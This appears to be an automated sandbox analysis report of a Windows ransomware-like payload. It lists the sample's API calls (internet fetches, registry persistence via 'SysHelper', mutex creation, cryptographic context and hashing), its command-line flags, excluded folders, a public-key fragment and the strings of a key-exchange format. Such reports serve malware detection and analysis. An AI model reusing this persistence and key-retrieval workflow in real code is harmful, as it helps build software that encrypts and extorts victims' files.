40142 e52d33 58 API calls __isleadbyte_l 40122->40142 40123->40122 40124->40095 40125 e5e2bb WriteFile 40124->40125 40125->40094 40125->40127 40126 e7058c WriteConsoleW CreateFileW __putwch_nolock 40126->40127 40127->40094 40127->40095 40127->40122 40127->40126 40128 e5e315 WriteFile 40127->40128 40128->40094 40128->40127 40129->40035 40130->40041 40131->40054 40132->40050 40133->40041 40134->40050 40135->40063 40136->40059 40137->40072 40138->40099 40139->40082 40140->40099 40141->40077 40142->40122 40143->40099 40144->40099 40145->40099 40146->39894 40147->39898 40148->39900 40149->39905 40150->39914 40151->39452 40154 e43c62 40153->40154 40161 e43c74 _memset 40153->40161 40155 e43c96 40154->40155 40156 e43c67 40154->40156 40170 e7f23e 59 API calls 2 library calls 40155->40170 40158 e53b4c 59 API calls 40156->40158 40159 e43c6d 40158->40159 40159->40161 40171 e7f1bb 59 API calls 3 library calls 40159->40171 40161->39456 40164 e48513 40163->40164 40169 e48520 40163->40169 40164->40169 40172 e45810 59 API calls ___init_ctype 40164->40172 40165 e48619 40165->39458 40167 e7f23e 59 API calls 40167->40169 40169->40165 40169->40167 40173 e46760 59 API calls 2 library calls 40169->40173 40172->40169 40173->40169 40174->39461 40175->39464 40176->39467 40177->39471 40178->39474 40179->39500 40180->39503 40181->39505 40182->39488 40183->39490 40185->39520 40186->39520 40187->39549 40188->39549 40189->39560 40190->39560 40191->39565 40224 e51037 40192->40224 40194 e3c78a 40194->39578 40221 e50546 58 API calls 2 library calls 40194->40221 40196 e52909 _wprintf 40195->40196 40197 e5291c 40196->40197 40198 e52941 _GetLcidFromLangCountry 40196->40198 40199 e55208 __flsbuf 58 API calls 40197->40199 40426 e50e53 40198->40426 40200 e52921 40199->40200 40425 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40200->40425 40203 e5292c _wprintf 40203->39584 40204 e52950 40205 e52981 40204->40205 40432 e5d6c7 80 API calls 4 library calls 40204->40432 40433 e529a1 
LeaveCriticalSection LeaveCriticalSection _setvbuf 40205->40433 40209 e53a44 _wprintf 40208->40209 40210 e53a70 40209->40210 40211 e53a58 40209->40211 40214 e50e53 __lock_file 59 API calls 40210->40214 40217 e53a68 _wprintf 40210->40217 40212 e55208 __flsbuf 58 API calls 40211->40212 40213 e53a5d 40212->40213 40450 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40213->40450 40216 e53a82 40214->40216 40434 e539cc 40216->40434 40217->39588 40221->39594 40222->39594 40223->39594 40226 e51043 _wprintf 40224->40226 40225 e51056 40227 e55208 __flsbuf 58 API calls 40225->40227 40226->40225 40228 e51087 40226->40228 40229 e5105b 40227->40229 40243 e58df4 40228->40243 40273 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40229->40273 40232 e5108c 40233 e51095 40232->40233 40234 e510a2 40232->40234 40235 e55208 __flsbuf 58 API calls 40233->40235 40236 e510cc 40234->40236 40237 e510ac 40234->40237 40238 e51066 _wprintf @_EH4_CallFilterFunc@8 40235->40238 40258 e58f13 40236->40258 40239 e55208 __flsbuf 58 API calls 40237->40239 40238->40194 40239->40238 40244 e58e00 _wprintf 40243->40244 40245 e58af7 __lock 58 API calls 40244->40245 40256 e58e0e 40245->40256 40246 e58e82 40275 e58f0a 40246->40275 40247 e58e89 40249 e58cde __malloc_crt 58 API calls 40247->40249 40251 e58e90 40249->40251 40250 e58eff _wprintf 40250->40232 40251->40246 40279 e6263e InitializeCriticalSectionAndSpinCount 40251->40279 40253 e58b9f __mtinitlocknum 58 API calls 40253->40256 40254 e50e92 _wprintf 59 API calls 40254->40256 40255 e58eb6 EnterCriticalSection 40255->40246 40256->40246 40256->40247 40256->40253 40256->40254 40278 e50efc LeaveCriticalSection LeaveCriticalSection _doexit 40256->40278 40267 e58f33 _TestDefaultCountry 40258->40267 40259 e58f4d 40260 e55208 __flsbuf 58 API calls 40259->40260 40262 e58f52 40260->40262 40261 e59108 40261->40259 40265 e5916b 40261->40265 40284 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40262->40284 40264 e510d7 40274 e510f9 
LeaveCriticalSection LeaveCriticalSection _setvbuf 40264->40274 40281 e6c214 40265->40281 40267->40259 40267->40261 40285 e6c232 60 API calls 3 library calls 40267->40285 40269 e59101 40269->40261 40286 e6c232 60 API calls 3 library calls 40269->40286 40271 e59120 40271->40261 40287 e6c232 60 API calls 3 library calls 40271->40287 40273->40238 40274->40238 40280 e58c81 LeaveCriticalSection 40275->40280 40277 e58f11 40277->40250 40278->40256 40279->40255 40280->40277 40288 e6b9f8 40281->40288 40283 e6c22d 40283->40264 40284->40264 40285->40269 40286->40271 40287->40261 40291 e6ba04 _wprintf 40288->40291 40289 e6ba1a 40290 e55208 __flsbuf 58 API calls 40289->40290 40292 e6ba1f 40290->40292 40291->40289 40293 e6ba50 40291->40293 40373 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40292->40373 40299 e6bac1 40293->40299 40298 e6ba29 _wprintf 40298->40283 40300 e6bae1 40299->40300 40375 e77f50 40300->40375 40302 e6bc34 40303 e542fd __wsopen_nolock 8 API calls 40302->40303 40304 e6c213 40303->40304 40305 e6bafd 40305->40302 40306 e6bb37 40305->40306 40311 e6bb5a 40305->40311 40406 e551d4 58 API calls __getptd_noexit 40306->40406 40308 e6bb3c 40309 e55208 __flsbuf 58 API calls 40308->40309 40310 e6bb49 40309->40310 40407 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40310->40407 40312 e6bc18 40311->40312 40320 e6bbf6 40311->40320 40408 e551d4 58 API calls __getptd_noexit 40312->40408 40315 e6ba6c 40374 e6ba95 LeaveCriticalSection __unlock_fhandle 40315->40374 40316 e6bc1d 40317 e55208 __flsbuf 58 API calls 40316->40317 40318 e6bc2a 40317->40318 40409 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40318->40409 40382 e6b1c2 40320->40382 40322 e6bcc4 40323 e6bcf1 40322->40323 40324 e6bcce 40322->40324 40400 e6b88d 40323->40400 40410 e551d4 58 API calls __getptd_noexit 40324->40410 40327 e6bcd3 40329 e55208 __flsbuf 58 API calls 40327->40329 40328 e6bd91 GetFileType 40332 e6bdde 40328->40332 40333 e6bd9c GetLastError 40328->40333 40331 e6bcdd 
40329->40331 40330 e6bd5f GetLastError 40411 e551e7 58 API calls 3 library calls 40330->40411 40336 e55208 __flsbuf 58 API calls 40331->40336 40413 e6b56e 59 API calls 2 library calls 40332->40413 40412 e551e7 58 API calls 3 library calls 40333->40412 40336->40315 40338 e6bdc3 CloseHandle 40340 e6bd84 40338->40340 40341 e6bdd1 40338->40341 40339 e6b88d ___createFile 3 API calls 40342 e6bd54 40339->40342 40346 e55208 __flsbuf 58 API calls 40340->40346 40344 e55208 __flsbuf 58 API calls 40341->40344 40342->40328 40342->40330 40347 e6bdd6 40344->40347 40345 e6bdfc 40348 e6bfb7 40345->40348 40365 e6be7d 40345->40365 40414 e5f744 60 API calls 3 library calls 40345->40414 40346->40302 40347->40340 40348->40302 40350 e6c18a CloseHandle 40348->40350 40352 e6b88d ___createFile 3 API calls 40350->40352 40351 e6be66 40370 e6be85 40351->40370 40415 e551d4 58 API calls __getptd_noexit 40351->40415 40355 e6c1b1 40352->40355 40354 e5b5c4 70 API calls __read_nolock 40354->40370 40356 e6c041 40355->40356 40357 e6c1b9 GetLastError 40355->40357 40356->40302 40419 e551e7 58 API calls 3 library calls 40357->40419 40359 e6c1c5 40420 e6b36b 59 API calls 2 library calls 40359->40420 40361 e5f744 60 API calls __lseeki64_nolock 40361->40370 40364 e5df14 __write 78 API calls 40364->40365 40365->40348 40365->40364 40367 e5f744 60 API calls __lseeki64_nolock 40365->40367 40365->40370 40366 e6c034 40418 e60b25 61 API calls 3 library calls 40366->40418 40367->40365 40368 e6c01d 40368->40348 40370->40354 40370->40361 40370->40365 40370->40366 40370->40368 40416 e60b25 61 API calls 3 library calls 40370->40416 40417 e77cac 82 API calls 6 library calls 40370->40417 40371 e6c03b 40372 e55208 __flsbuf 58 API calls 40371->40372 40372->40356 40373->40298 40374->40298 40376 e77f6f 40375->40376 40377 e77f5a 40375->40377 40376->40305 40378 e55208 __flsbuf 58 API calls 40377->40378 40379 e77f5f 40378->40379 40421 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40379->40421 40381 e77f6a 40381->40305 
40383 e6b1ce _wprintf 40382->40383 40384 e58b9f __mtinitlocknum 58 API calls 40383->40384 40385 e6b1df 40384->40385 40386 e6b1e4 _wprintf 40385->40386 40387 e58af7 __lock 58 API calls 40385->40387 40386->40322 40396 e6b1f2 40387->40396 40388 e6b340 40424 e6b362 LeaveCriticalSection _doexit 40388->40424 40390 e6b2d2 40391 e58c96 __calloc_crt 58 API calls 40390->40391 40395 e6b2db 40391->40395 40392 e58af7 __lock 58 API calls 40392->40396 40393 e6b272 EnterCriticalSection 40394 e6b282 LeaveCriticalSection 40393->40394 40393->40396 40394->40396 40395->40388 40397 e6b134 ___lock_fhandle 59 API calls 40395->40397 40396->40388 40396->40390 40396->40392 40396->40393 40422 e6263e InitializeCriticalSectionAndSpinCount 40396->40422 40423 e6b29a LeaveCriticalSection _doexit 40396->40423 40397->40388 40401 e6b898 ___crtIsPackagedApp 40400->40401 40402 e6b8f3 CreateFileW 40401->40402 40403 e6b89c GetModuleHandleW GetProcAddress 40401->40403 40405 e6b911 40402->40405 40404 e6b8b9 40403->40404 40404->40405 40405->40328 40405->40330 40405->40339 40406->40308 40407->40315 40408->40316 40409->40302 40410->40327 40411->40340 40412->40338 40413->40345 40414->40351 40415->40365 40416->40370 40417->40370 40418->40371 40419->40359 40420->40356 40421->40381 40422->40396 40423->40396 40424->40386 40425->40203 40427 e50e85 EnterCriticalSection 40426->40427 40428 e50e63 40426->40428 40430 e50e7b 40427->40430 40428->40427 40429 e50e6b 40428->40429 40431 e58af7 __lock 58 API calls 40429->40431 40430->40204 40431->40430 40432->40204 40433->40203 40435 e539ef 40434->40435 40436 e539db 40434->40436 40438 e539eb 40435->40438 40440 e5836b __flush 78 API calls 40435->40440 40437 e55208 __flsbuf 58 API calls 40436->40437 40439 e539e0 40437->40439 40451 e53aa7 LeaveCriticalSection LeaveCriticalSection _setvbuf 40438->40451 40452 e542d2 9 API calls __invalid_parameter_noinfo_noreturn 40439->40452 40442 e539fb 40440->40442 40453 e60bbf 58 API calls _free 40442->40453 40444 e53a03 40445 e5816b __flsbuf 
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00E3CF10: _memset.LIBCMT ref: 00E3CF4A
                                                                                                                              • Part of subcall function 00E3CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00E3CF5F
                                                                                                                              • Part of subcall function 00E3CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3CFA6
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E49FC4
                                                                                                                            • GetLastError.KERNEL32 ref: 00E49FD2
                                                                                                                            • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00E49FDA
                                                                                                                            • GetLastError.KERNEL32 ref: 00E49FE4
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,012F31B0,?), ref: 00E4A0BB
                                                                                                                            • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E4A0C2
                                                                                                                            • GetCommandLineW.KERNEL32(?,?), ref: 00E4A161
                                                                                                                              • Part of subcall function 00E424E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 00E424FE
                                                                                                                              • Part of subcall function 00E424E0: GetLastError.KERNEL32 ref: 00E42509
                                                                                                                              • Part of subcall function 00E424E0: CloseHandle.KERNEL32 ref: 00E4251C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                            • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv4l59cnPvyHS7MUq7f+l\\nmWik31Q0OnzfKZM8KMJoY+yyFL+S3uDL9P$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$list<T> too long${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2957410896-1622685476
                                                                                                                            • Opcode ID: ad5fef989ed410f83a46672a233de0c727af27062eef9eacd967edb45b1ec99d
                                                                                                                            • Instruction ID: 47cd5a80edc0ac7d8d897fe0c627b4157443f0761616d452d95c63f93aa14230
                                                                                                                            • Opcode Fuzzy Hash: ad5fef989ed410f83a46672a233de0c727af27062eef9eacd967edb45b1ec99d
                                                                                                                            • Instruction Fuzzy Hash: B7D2B0706043419BDB14EF34E845BABB7E5BF94304F54192CF585A7292EB71EA08CB93
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(00000094), ref: 00EB1983
                                                                                                                            • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00EB1994
                                                                                                                            • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 00EB19A1
                                                                                                                            • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 00EB19AE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 00EB19E8
                                                                                                                            • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00EB19FB
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00EB1A2D
                                                                                                                            • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00EB1A81
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1AC5
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00EB1ADB
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00EB1AEE
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00EB1B01
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1C15
                                                                                                                            • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00EB1C36
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00EB1C50
                                                                                                                            • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00EB1C63
                                                                                                                            • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00EB1C76
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00EB1D45
                                                                                                                            • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00EB1D73
                                                                                                                            • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00EB1D86
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32First), ref: 00EB1D99
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00EB1DAC
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00EB1DBF
                                                                                                                            • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00EB1DD2
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32First), ref: 00EB1DE5
                                                                                                                            • GetProcAddress.KERNEL32(?,Process32Next), ref: 00EB1DF8
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32First), ref: 00EB1E0B
                                                                                                                            • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00EB1E1E
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32First), ref: 00EB1E31
                                                                                                                            • GetProcAddress.KERNEL32(?,Module32Next), ref: 00EB1E44
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00EB1EDD
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB1F03
                                                                                                                            • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00EB1F1A
                                                                                                                            • Heap32First.KERNEL32(00000024,?,?), ref: 00EB1F95
                                                                                                                            • Heap32Next.KERNEL32(?,?,?,?,?,B5D9D8E5), ref: 00EB1FE3
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB1FF1
                                                                                                                            • Heap32ListNext.KERNEL32(?,?), ref: 00EB2058
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2066
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2095
                                                                                                                            • Process32First.KERNEL32(?,00000128), ref: 00EB20AA
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB20FB
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2118
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB2187
                                                                                                                            • GetTickCount.KERNEL32 ref: 00EB21A4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                            • API String ID: 4174345323-1723836103
                                                                                                                            • Opcode ID: 11e3a43bb64c85e05c7090cafbde5917df8622e0f52f71ded5e6fd118456d35d
                                                                                                                            • Instruction ID: 0f98187f848b3ef3930c2363afdddd828f659c90531abac5bedc63c841d29e6f
                                                                                                                            • Opcode Fuzzy Hash: 11e3a43bb64c85e05c7090cafbde5917df8622e0f52f71ded5e6fd118456d35d
                                                                                                                            • Instruction Fuzzy Hash: 74323EB0E402299ADB219F68CC45BEEB6B9FF45705F0051EAE60CF6191EB708E84CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(?,?,?,?,?,00EFB3EC,000000FF), ref: 00E4E6C0
                                                                                                                              • Part of subcall function 00E3C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E4E6D4), ref: 00E3C6C2
                                                                                                                              • Part of subcall function 00E3C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E3C6F3
                                                                                                                              • Part of subcall function 00E3C6A0: RegCloseKey.ADVAPI32(00000000), ref: 00E3C700
                                                                                                                            • _memset.LIBCMT ref: 00E4E707
                                                                                                                              • Part of subcall function 00E3C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E3C51B
                                                                                                                            • InternetOpenW.WININET ref: 00E4E743
                                                                                                                            • _wcsstr.LIBCMT ref: 00E4E7AE
                                                                                                                            • _memmove.LIBCMT ref: 00E4E838
                                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 00E4E90A
                                                                                                                            • lstrcatW.KERNEL32(?,&first=false), ref: 00E4E93D
                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E4E954
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E4E96F
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4E98C
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4E9A3
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E4E9CD
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F3
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E4E9F6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EA36
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EA59
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EA74
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EA82
                                                                                                                            • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E4EA92
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EAA4
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EABA
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EAC8
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4EAE3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EB5B
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EB7C
                                                                                                                            • _malloc.LIBCMT ref: 00E4EB86
                                                                                                                            • _memset.LIBCMT ref: 00E4EB94
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E4EBAE
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EBB6
                                                                                                                            • _strstr.LIBCMT ref: 00E4EBDA
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EC00
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EC24
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EC32
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EC3E
                                                                                                                            • lstrlenA.KERNEL32(","id":"), ref: 00E4EC51
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EC6D
                                                                                                                            • lstrcpyA.KERNEL32(?,?), ref: 00E4EC7F
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4EC93
                                                                                                                            • lstrlenA.KERNEL32(00000022), ref: 00E4ECB3
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4ED2A
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00E4ED4B
                                                                                                                            • _malloc.LIBCMT ref: 00E4ED55
                                                                                                                            • _memset.LIBCMT ref: 00E4ED63
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 00E4ED7D
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4ED85
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EDA3
                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00E4EDAE
                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E4EDD3
                                                                                                                            • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E4EDF7
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00E4EE05
                                                                                                                            • _free.LIBCMT ref: 00E4EE15
                                                                                                                            • _free.LIBCMT ref: 00E4EE22
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EF61
                                                                                                                            • lstrcpyW.KERNEL32(?,00000000), ref: 00E4EFBF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2913842192.0000000000E30000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914042821.0000000000F3A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914079083.0000000000F3C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F40000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F4A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914117982.0000000000F59000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                            • Associated: 00000003.00000002.2914228176.0000000000F5B000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_e30000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                            • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                            • API String ID: 704684250-3586605218
                                                                                                                            • Opcode ID: ebec0647713f53d373855c534a07ab4f12aae95edf03d7755ab3a9d00b5e816f
                                                                                                                            • Instruction ID: a055521f942bcb516a6f158d5f96e7d4a5c976c6d952a2d2e9a3176d99669964
                                                                                                                            • Opcode Fuzzy Hash: ebec0647713f53d373855c534a07ab4f12aae95edf03d7755ab3a9d00b5e816f
                                                                                                                            • Instruction Fuzzy Hash: 2942E571508344AFDB20DF24EC49BABBBE8BF85304F14195DF585A7292DB70E509CBA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00E41010
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E41026
                                                                                                                              • Part of subcall function 00E60ECA: RaiseException.KERNEL32(?,?,00E7F26B,?,?,00000000,?,?,?,?,00E7F26B,?,00F381FC,?), ref: 00E60F1F
                                                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00E4103B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00E41051
                                                                                                                            • lstrlenA.KERNEL32(?,00000000), ref: 00E41059
                                                                                                                            • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00E41064
